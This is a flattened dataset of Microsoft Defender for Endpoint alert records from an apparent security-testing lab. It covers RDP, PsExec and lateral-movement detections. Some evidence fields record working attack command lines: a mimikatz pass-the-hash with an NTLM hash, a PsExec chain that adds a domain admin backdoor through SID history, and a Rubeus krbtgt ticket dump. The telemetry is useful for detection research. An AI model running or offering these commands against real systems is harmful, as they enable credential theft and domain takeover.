"processCreationTime": "2022-11-16T03:32:14.9719242Z",
"processId": 4,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "f83368154fce0f4e8f9d6fe000ef522fbb3884b7",
"sha256": "7e4a848626c99c715bd2c8686061420b8895e12ab8dfa0cce091f9df25750c13",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:09:15.4733333Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:06:14.4989431Z",
"processId": 4572,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:16:03.1466667Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:12:11.2117933Z",
"processId": 1984,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:17:34.0266667Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:14:30.1674201Z",
"processId": 9008,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:19:04.94Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:16:27.1164549Z",
"processId": 7888,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:23:11.6Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:22:22.878082Z",
"processId": 8064,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:28:04.79Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:24:45.5696509Z",
"processId": 6984,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:33:30.8133333Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:31:41.876943Z",
"processId": 9664,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:36:19.81Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:33:42.4457797Z",
"processId": 9656,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
Process
|
2022-09-30T06:16:01.64Z
|
Suspicious
|
None
|
bob
|
NT AUTHORITY
|
S-1-5-18
| null | null |
f309b61a8b005b5ce0a3fb58caaa798cfc95f5db
|
3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748
|
PSEXESVC.exe
|
C:\Windows
| 8,072
|
PSEXESVC.exe
|
2022-09-30T06:13:03.9136767Z
| 624
|
2022-09-15T03:19:37.3201866Z
|
services.exe
|
C:\Windows\System32
|
Detected
|
36150b3c1b69b5c2da9df4efd86ac6c166924a48
|
da638037516228377732_155258855
|
c8cf2517-a330-48c8-b567-19fdf58e0a22
| 686
|
MicrosoftDefenderForEndpoint
|
2022-11-11T08:20:22.8377902Z
|
2022-11-12T01:35:42.87Z
|
2022-11-11T09:47:40.27713Z
|
2022-11-11T08:07:33.1964484Z
|
2022-11-11T08:17:05.7568492Z
|
Suspicious RDP session
|
A combination of several suspicious RDP session activities has been detected in this device. Attackers might be attempting to establish a foothold in the environment by using various reconnaissance and persistence methods, then evade detection by tampering with and turning off security features to complete their objectives.
|
SuspiciousActivity
|
Resolved
|
High
| 39
|
SuccessfullyRemediated
|
TruePositive
|
SecurityTesting
|
WindowsDefenderAtp
|
e3270960-77a9-4f2b-a6ba-ea6a9d5e86d8
|
msftadmin@msdxv2.m365dpoc.com
| null | null |
[
"T1003",
"T1021.001",
"T1555",
"T1558.003"
] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "lab.net",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "High",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] |
[
{
"aadUserId": null,
"accountName": "MSDXV2-Win10V$",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV2",
"entityType": "User",
"evidenceCreationTime": "2022-11-11T08:20:22.8833333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-11T08:20:22.8833333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-11T08:20:22.8833333Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "NotFound",
"remediationStatusDetails": "The system cannot find the file specified.",
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Malicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-11T08:20:22.8833333Z",
"fileName": "Rubeus.exe",
"filePath": "C:\\M365DAttack\\Rubeus",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Remediated",
"remediationStatusDetails": null,
"sha1": "fc870d086c53ded2e94300f7569aa9478186f2c7",
"sha256": "a1fddd460edd35ed449d32cc43bc15675c48a314a6fa5fb158e3bc4fea460be1",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Malicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Ip",
"evidenceCreationTime": "2022-11-11T08:20:22.8833333Z",
"fileName": null,
"filePath": null,
"ipAddress": "10.0.1.5",
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-11T08:20:22.8833333Z",
"fileName": "powershell.exe",
"filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-10T07:07:26.0872385Z",
"parentProcessFileName": "explorer.exe",
"parentProcessFilePath": "C:\\Windows",
"parentProcessId": 4680,
"processCommandLine": "\"powershell.exe\" -noexit -command Set-Location -literalPath 'C:\\Users\\jeff\\Downloads\\internal'",
"processCreationTime": "2022-11-11T08:16:44.2952776Z",
"processId": 4704,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c",
"sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
Process
|
2022-11-18T04:44:34.51Z
|
Unknown
|
None
|
Takeshi
|
TMTOWER-BOOK
|
S-1-5-21-7316772-2057538409-3008203053-1001
| null | null |
70df765f554ed7392200422c18776b8992c09231
|
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
|
mimikatz.exe
|
C:\M365DAttack\Mimikatz\x64
| 14,652
|
"mimikatz.exe" privilege::debug "sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:WORKGROUP /run:\"powershell.exe dir \\tmtower-book-win10b\C$ >> C:\M365DAttack\Step3-PasstheHash.txt\"" exit
|
2022-11-18T04:38:47.8575649Z
| 14,616
|
2022-11-14T04:36:16.5242809Z
|
powershell.exe
|
C:\Windows\System32\WindowsPowerShell\v1.0
|
Detected
|
83b06aa80899050e5d4132992e36b5b8f14b64e9
|
da638001152928403278_1145689599
|
22462113-616d-41e9-9adc-c0808f62a2cd
| 486
|
MicrosoftDefenderForEndpoint
|
2022-09-30T06:14:52.8403462Z
|
2022-11-19T01:35:42.7033333Z
|
2022-10-01T01:36:00.5066667Z
|
2022-09-30T06:11:59.8745989Z
|
2022-09-30T06:13:28.9994915Z
|
Suspicious PsExec in Remote Machine
|
PsExec initiated a Suspicious process in a network or remote machine. Initiated process may cause more damage.
|
LateralMovement
|
Resolved
|
Medium
| null |
UnsupportedAlertType
|
TruePositive
|
SecurityTesting
|
WindowsDefenderAtp
|
40eca4c4-8854-418a-8024-fff7c9d7b077
|
msftadmin@msdxv2.m365dpoc.com
| null | null |
[
"T1021",
"T1021.002",
"T1569.002"
] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "Critical",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] |
[
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-09-30T06:14:52.89Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-09-30T06:14:52.89Z",
"fileName": "powershell.exe",
"filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": "\"powershell.exe\" ",
"processCreationTime": "2022-09-30T06:11:13.210308Z",
"processId": 4064,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c",
"sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-09-30T06:14:52.89Z",
"fileName": "PsExec.exe",
"filePath": "C:\\M365DAttack\\PsTools",
"ipAddress": null,
"parentProcessCreationTime": "2022-09-30T06:11:13.210308Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 4064,
"processCommandLine": "\"PsExec.exe\" \\\\msdxv2-dc -accepteula cmd /c \"net.exe user /add BDAdmin Password1! && net.exe stop ntds /y && powershell.exe -Command \"Add-ADDBSidHistory -SamAccountName BDAdmin -SidHistory \\\"S-1-5-32-544\\\" -DatabasePath (Get-ItemProperty -Path Registry::HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters).\\\"DSA Database file\\\"\" && net.exe start ntds\"",
"processCreationTime": "2022-09-30T06:13:07.0509248Z",
"processId": 2228,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "b97761358338e640a31eef5e5c5773b633890914",
"sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-09-30T06:14:53.6533333Z",
"fileName": "powershell.exe",
"filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": "powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1",
"processCreationTime": "2022-09-30T06:11:59.5129511Z",
"processId": 9368,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c",
"sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-09-30T06:14:53.6533333Z",
"fileName": "PsExec.exe",
"filePath": "C:\\M365DAttack\\PsTools",
"ipAddress": null,
"parentProcessCreationTime": "2022-09-30T06:11:59.5129511Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 9368,
"processCommandLine": "\"PsExec.exe\" \\\\msdxv2-win10b -accepteula cmd /c \"C:\\Temp\\Rubeus.exe dump /service:krbtgt /user:steve > C:\\Temp\\AdminTicket.txt\"",
"processCreationTime": "2022-09-30T06:12:00.7573565Z",
"processId": 10400,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "b97761358338e640a31eef5e5c5773b633890914",
"sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638001153615003333_1678515249
|
76ffd1e5-45b0-458e-9255-d679c5aa1ddf
| 486
|
MicrosoftDefenderForEndpoint
|
2022-09-30T06:16:01.5003536Z
|
2022-11-19T01:35:42.7033333Z
|
2022-10-01T01:36:00.5066667Z
|
2022-09-30T06:12:00.8318757Z
|
2022-09-30T06:13:04.3376842Z
|
File dropped and launched from remote location
|
A remote session dropped a file and executed it. An attacker or a malware might be an attempting move laterally or propagate.
|
LateralMovement
|
Resolved
|
Medium
| 22
|
TerminatedBySystem
|
TruePositive
|
SecurityTesting
|
WindowsDefenderAtp
|
17d50613-c135-4981-858e-86cdecb4e46e
|
msftadmin@msdxv2.m365dpoc.com
| null | null |
[
"T1021.002",
"T1105",
"T1570"
] |
[
{
"aadDeviceId": "14b11ffe-5128-4842-bbdf-31f0fbfcb600",
"defenderAvStatus": "Updated",
"deviceDnsName": "malicious.io",
"firstSeen": "2022-08-08T08:29:47.252Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "steve",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"onboardingStatus": "Onboarded",
"osBuild": 19043,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Semi Auto Client",
"riskScore": "High",
"tags": [
"semi auto"
],
"version": "21H1",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10B",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "2f7d6bc4-df6d-4836-becd-aff9cb361b66"
}
}
] |
[
{
"aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c",
"accountName": "ronhd",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-09-30T06:16:01.5966667Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "ronhd@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1111",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-09-30T06:16:01.5966667Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Ip",
"evidenceCreationTime": "2022-09-30T06:16:01.5966667Z",
"fileName": null,
"filePath": null,
"ipAddress": "10.0.0.9",
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-09-30T06:16:01.5966667Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-09-15T03:19:37.3201866Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 624,
"processCommandLine": "PSEXESVC.exe",
